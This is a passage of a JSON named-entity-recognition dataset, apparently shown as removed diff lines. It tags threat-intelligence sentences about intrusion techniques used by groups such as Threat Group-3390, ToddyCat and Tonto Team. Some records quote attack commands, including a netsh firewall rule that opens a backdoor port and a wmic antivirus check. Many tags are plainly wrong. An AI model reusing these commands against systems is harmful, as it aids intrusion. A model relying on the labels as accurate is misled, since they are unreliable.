"CVE-2017-0213", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "exploited", - "MS17-010", - "to", - "move", - "laterally", - "to", - "other", - "systems", - "on", - "the", - "network." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "look", - "for", - "and", - "use", - "VPN", - "profiles", - "during", - "an", - "operation", - "to", - "access", - "the", - "network", - "using", - "external", - "VPN", - "services.", - "Threat", - "Group-3390", - "has", - "also", - "obtained", - "OWA", - "account", - "credentials", - "during", - "intrusions", - "that", - "it", - "subsequently", - "used", - "to", - "attempt", - "to", - "regain", - "access", - "when", - "evicted", - "from", - "a", - "victim", - "network." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "deleted", - "existing", - "logs", - "and", - "exfiltrated", - "file", - "archives", - "from", - "a", - "victim." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "downloaded", - "additional", - "malware", - "and", - "tools,", - "including", - "through", - "the", - "use", - "of", - "`certutil`,", - "onto", - "a", - "compromised", - "host", - "." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "installed", - "a", - "credential", - "logger", - "on", - "Microsoft", - "Exchange", - "servers.", - "Threat", - "Group-3390", - "also", - "leveraged", - "the", - "reconnaissance", - "framework,", - "ScanBox,", - "to", - "capture", - "keystrokes." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "have", - "used", - "gsecdump", - "to", - "dump", - "credentials.", - "They", - "have", - "also", - "dumped", - "credentials", - "from", - "domain", - "controllers." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "have", - "used", - "a", - "modified", - "version", - "of", - "Mimikatz", - "called", - "Wrapikatz", - "to", - "dump", - "credentials.", - "They", - "have", - "also", - "dumped", - "credentials", - "from", - "domain", - "controllers." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "<code>net", - "user</code>", - "to", - "conduct", - "internal", - "discovery", - "of", - "systems." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "locally", - "staged", - "encrypted", - "archives", - "for", - "later", - "exfiltration", - "efforts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "lured", - "victims", - "into", - "opening", - "malicious", - "files", - "containing", - "malware." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Threat", - "Group-3390", - "tool", - "has", - "created", - "new", - "Registry", - "keys", - "under", - "`HKEY_CURRENT_USER\\Software\\Classes\\`", - "and", - "`HKLM\\SYSTEM\\CurrentControlSet\\services`." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "use", - "the", - "Hunter", - "tool", - "to", - "conduct", - "network", - "service", - "discovery", - "for", - "vulnerable", - "systems." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "detached", - "network", - "shares", - "after", - "exfiltrating", - "files,", - "likely", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "obtained", - "a", - "KeePass", - "database", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "PowerShell", - "for", - "execution." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Threat", - "Group-3390", - "tool", - "can", - "spawn", - "`svchost.exe`", - "and", - "inject", - "the", - "payload", - "into", - "that", - "process." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Threat", - "Group-3390", - "tool", - "can", - "read", - "and", - "decrypt", - "stored", - "Registry", - "values." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390's", - "malware", - "can", - "add", - "a", - "Registry", - "key", - "to", - "`Software\\Microsoft\\Windows\\CurrentVersion\\Run`", - "for", - "persistence." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "moved", - "staged", - "encrypted", - "archives", - "to", - "Internet-facing", - "servers", - "that", - "had", - "previously", - "been", - "compromised", - "with", - "China", - "Chopper", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "the", - "<code>net", - "view</code>", - "command." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "have", - "used", - "gsecdump", - "to", - "dump", - "credentials.", - "They", - "have", - "also", - "dumped", - "credentials", - "from", - "domain", - "controllers." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "packed", - "malware", - "and", - "tools,", - "including", - "using", - "VMProtect." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "e-mail", - "to", - "deliver", - "malicious", - "attachments", - "to", - "victims." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "use", - "NBTscan", - "to", - "discover", - "vulnerable", - "systems." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "`net", - "use`", - "and", - "`netstat`", - "to", - "conduct", - "internal", - "discovery", - "of", - "systems.", - "The", - "group", - "has", - "also", - "used", - "`quser.exe`", - "to", - "identify", - "existing", - "RDP", - "sessions", - "on", - "a", - "victim." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "`whoami`", - "to", - "collect", - "system", - "user", - "information." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Impacket,", - "pwdump,", - "Mimikatz,", - "gsecdump,", - "NBTscan,", - "and", - "Windows", - "Credential", - "Editor." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "compromised", - "third", - "party", - "service", - "providers", - "to", - "gain", - "access", - "to", - "victim's", - "environments." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "hosted", - "malicious", - "payloads", - "on", - "Dropbox." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "staged", - "tools,", - "including", - "gsecdump", - "and", - "WCE,", - "on", - "previously", - "compromised", - "websites." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "obtain", - "legitimate", - "credentials", - "using", - "a", - "variety", - "of", - "methods", - "and", - "use", - "them", - "to", - "further", - "lateral", - "movement", - "on", - "victim", - "networks." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "malware", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "a", - "variety", - "of", - "Web", - "shells." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "command-line", - "interfaces", - "for", - "execution." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Threat", - "Group-3390", - "tool", - "can", - "use", - "WMI", - "to", - "execute", - "a", - "binary." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "WinRM", - "to", - "enable", - "remote", - "execution." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390's", - "malware", - "can", - "create", - "a", - "new", - "service,", - "sometimes", - "naming", - "it", - "after", - "the", - "config", - "information,", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Thrip", - "has", - "used", - "WinSCP", - "to", - "exfiltrate", - "data", - "from", - "a", - "targeted", - "organization", - "over", - "FTP." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Thrip", - "leveraged", - "PowerShell", - "to", - "run", - "commands", - "to", - "download", - "payloads,", - "traverse", - "the", - "compromised", - "networks,", - "and", - "carry", - "out", - "reconnaissance." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Thrip", - "used", - "a", - "cloud-based", - "remote", - "access", - "software", - "called", - "LogMeIn", - "for", - "their", - "attacks." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "Thrip", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz", - "and", - "PsExec." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "leveraged", - "xcopy,", - "7zip,", - "and", - "RAR", - "to", - "stage", - "and", - "compress", - "collected", - "documents", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "run", - "scripts", - "to", - "collect", - "documents", - "from", - "targeted", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Prior", - "to", - "executing", - "a", - "backdoor", - "ToddyCat", - "has", - "run", - "`cmd", - "/c", - "start", - "/b", - "netsh", - "advfirewall", - "firewall", - "add", - "rule", - "name=\"SGAccessInboundRule\"", - "dir=in", - "protocol=udp", - "action=allow", - "localport=49683`", - "to", - "allow", - "the", - "targeted", - "system", - "to", - "receive", - "UDP", - "packets", - "on", - "port", - "49683." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "run", - "`net", - "user", - "%USER%", - "/dom`", - "for", - "account", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "compromised", - "domain", - "admin", - "credentials", - "to", - "mount", - "local", - "network", - "shares." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "executed", - "`net", - "group", - "\"domain", - "admins\"", - "/dom`", - "for", - "discovery", - "on", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "a", - "DropBox", - "uploader", - "to", - "exfiltrate", - "stolen", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "exploited", - "the", - "ProxyLogon", - "vulnerability", - "(CVE-2021-26855)", - "to", - "compromise", - "Exchange", - "Servers", - "at", - "multiple", - "organizations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Features", - "B-Exp", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "run", - "scripts", - "to", - "enumerate", - "recently", - "modified", - "documents", - "having", - "either", - "a", - ".pdf,", - ".doc,", - ".docx,", - ".xls", - "or", - ".xlsx", - "extension." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "hidden", - "malicious", - "scripts", - "using", - "`powershell.exe", - "-windowstyle", - "hidden`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "the", - "name", - "`debug.exe`", - "for", - "malware", - "components." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "`WinExec`", - "to", - "execute", - "commands", - "received", - "from", - "C2", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "a", - "passive", - "backdoor", - "that", - "receives", - "commands", - "with", - "UDP", - "packets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "Powershell", - "scripts", - "to", - "perform", - "post", - "exploit", - "collection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "run", - "`cmd", - "/c", - "start", - "/b", - "tasklist`", - "to", - "enumerate", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "manually", - "transferred", - "collected", - "files", - "to", - "an", - "exfiltration", - "host", - "using", - "xcopy." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "`ping", - "%REMOTE_HOST%`", - "for", - "post", - "exploit", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "locally", - "mounted", - "network", - "shares", - "for", - "lateral", - "movement", - "through", - "targated", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "scheduled", - "tasks", - "to", - "execute", - "discovery", - "commands", - "and", - "scripts", - "for", - "collection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "can", - "determine", - "is", - "Kaspersky", - "software", - "is", - "running", - "on", - "an", - "endpoint", - "by", - "running", - "`cmd", - "/c", - "wmic", - "process", - "where", - "name=\"avp.exe\"`." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "sent", - "loaders", - "configured", - "to", - "run", - "Ninja", - "as", - "zip", - "archives", - "via", - "Telegram." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "collected", - "information", - "on", - "bootable", - "drives", - "including", - "model,", - "vendor,", - "and", - "serial", - "numbers." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "`netstat", - "-anop", - "tcp`", - "to", - "discover", - "TCP", - "connections", - "to", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - ".bat", - "scripts", - "and", - "`cmd`", - "for", - "execution", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ToddyCat", - "has", - "used", - "WMI", - "to", - "execute", - "scripts", - "for", - "post", - "exploit", - "document", - "collection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "abuses", - "a", - "legitimate", - "and", - "signed", - "Microsoft", - "executable", - "to", - "launch", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "exploited", - "Microsoft", - "vulnerabilities,", - "including", - "CVE-2018-0798,", - "CVE-2018-8174,", - "CVE-2018-0802,", - "CVE-2017-11882,", - "CVE-2019-9489", - "CVE-2020-8468,", - "and", - "CVE-2018-0798", - "to", - "enable", - "execution", - "of", - "their", - "delivered", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "exploited", - "CVE-2019-0803", - "and", - "MS16-032", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "used", - "EternalBlue", - "exploits", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "routed", - "their", - "traffic", - "through", - "an", - "external", - "server", - "in", - "order", - "to", - "obfuscate", - "their", - "location." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-OffAct", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "downloaded", - "malicious", - "DLLs", - "which", - "served", - "as", - "a", - "ShadowPad", - "loader." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "used", - "keylogging", - "tools", - "in", - "their", - "operations." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "used", - "the", - "<code>ShowLocalGroupDetails</code>", - "command", - "to", - "identify", - "administrator,", - "user,", - "and", - "guest", - "accounts", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "relied", - "on", - "user", - "interaction", - "to", - "open", - "their", - "malicious", - "RTF", - "documents." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "used", - "tools", - "such", - "as", - "NBTscan", - "to", - "enumerate", - "network", - "shares." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "used", - "a", - "variety", - "of", - "credential", - "dumping", - "tools." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "used", - "PowerShell", - "to", - "download", - "additional", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "used", - "Python-based", - "tools", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "delivered", - "payloads", - "via", - "spearphishing", - "attachments." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Tonto", - "Team", - "has", - "used", - "a", - "first", - "stage", - "web", - "shell", - "after", - "compromising", - "a", - "vulnerable", - "Exchange", - "server." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "registered", - "domains", - "to", - "mimic", - "file", - "sharing,", - "government,", - "defense,", - "and", - "research", - "websites", - "for", - "use", - "in", - "targeted", - "campaigns." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Idus", - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "compromised", - "domains", - "for", - "use", - "in", - "targeted", - "malicious", - "campaigns." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "used", - "websites", - "with", - "malicious", - "hyperlinks", - "and", - "iframes", - "to", - "infect", - "targeted", - "victims", - "with", - "Crimson,", - "njRAT,", - "and", - "other", - "malicious", - "tools." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "set", - "up", - "websites", - "with", - "malicious", - "hyperlinks", - "and", - "iframes", - "to", - "infect", - "targeted", - "victims", - "with", - "Crimson,", - "njRAT,", - "and", - "other", - "malicious", - "tools." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "used", - "dynamic", - "DNS", - "services", - "to", - "set", - "up", - "C2." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "dropped", - "encoded", - "executables", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "crafted", - 